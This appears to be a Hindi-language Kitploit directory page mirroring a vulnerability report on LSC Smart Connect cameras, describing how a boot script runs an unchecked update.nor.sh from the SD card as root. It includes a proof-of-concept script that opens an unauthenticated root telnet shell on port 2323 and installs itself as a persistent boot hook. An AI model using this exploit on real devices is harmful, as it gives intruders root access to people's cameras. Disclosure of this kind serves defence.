Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-65817 — यह CVE-2025-65817 है | Kitploit
उपकरण/GitHubGitHub/istaarkk/cve-2025-65817
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणहार्डवेयर और IoT सुरक्षारिमोट एक्सेस टूल
GitHubistaarkk/cve-2025-65817

CVE-2025-65817

यह CVE-2025-65817 है

रिपॉजिटरी देखें
9119 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-65817


फ़ील्डमान
शीर्षकLSC स्मार्ट कनेक्ट कैमरा: भेद्यता रिपोर्ट
दिनांक2024-02-15
विवरणLSC स्मार्ट कनेक्ट कैमरों पर दूरस्थ शेल चलाने के लिए SD-कार्ड अपडेट हुक का दुरुपयोग।
टैगiot, vulnerability, cve
फ़र्मवेयर1.14.13

LSC स्मार्ट कनेक्ट कैमरा पर भेद्यता रिपोर्ट

पाई गई भेद्यता start_app.sh में अपडेट सिस्टम का शोषण करने पर आधारित है, विशेष रूप से SD कार्ड माउंट और update.nor.sh फ़ाइल के माध्यम से।

कॉन्फ़िगरेशन वेरिएबल्स

# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"

local/sbin/start_app.sh:50–99 खंड SD कार्ड पर स्थित update.nor.sh नामक किसी भी फ़ाइल पर आँख बंद करके भरोसा करता है। बूट प्रक्रिया के दौरान, स्क्रिप्ट:

  • SD कार्ड को माउंट करती है,
  • update.nor.sh को /tmp/update.nor.sh में कॉपी करती है,
  • इसकी सामग्री, अखंडता, अनुमतियों या स्वामित्व की कोई जाँच नहीं करती।

स्टार्टअप अनुक्रम में बाद में (local/sbin/start_app.sh:108–129), कॉपी की गई फ़ाइल:

  • निष्पादन योग्य के रूप में चिह्नित की जाती है,
  • रूट के रूप में चलाई जाती है,
  • SD कार्ड के माउंट बिंदु को एक तर्क के रूप में पास करके निष्पादित की जाती है।

यह निष्पादन मुख्य ipc_service शुरू होने से पहले होता है, जिसका अर्थ है कि स्क्रिप्ट उच्चतम-विशेषाधिकार वातावरण में चलती है, जहाँ नेटवर्किंग उपयोगिताएँ, वॉचडॉग फ़ंक्शन और अपग्रेड सहायक पहले से उपलब्ध होते हैं।

उपलब्ध उपयोगिताएँ

इस शोषण में एक शेल बनाना और कैमरे पर मौजूद telnetd के माध्यम से एक पोर्ट खोलना शामिल है:

/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]

प्रूफ ऑफ कॉन्सेप्ट

हमें बस SD कार्ड में एक .sh स्क्रिप्ट लिखनी है और उसका नाम update.nor.sh रखना है।

मेरा चुना गया शोषण है:

#!/bin/sh

telnetd -l /bin/sh -p 2323 &

echo "Telnet start by update.nor.sh" > /tmp/exploit_success

cp /mnt/update.nor.sh /mnt/config/hook-boot.sh

date > /tmp/exploit_time

हम पुष्टि करते हैं कि पोर्ट खुला है।

alt text

हम telnet के माध्यम से कनेक्ट करते हैं:

alt text

टूल डाउनलोड करें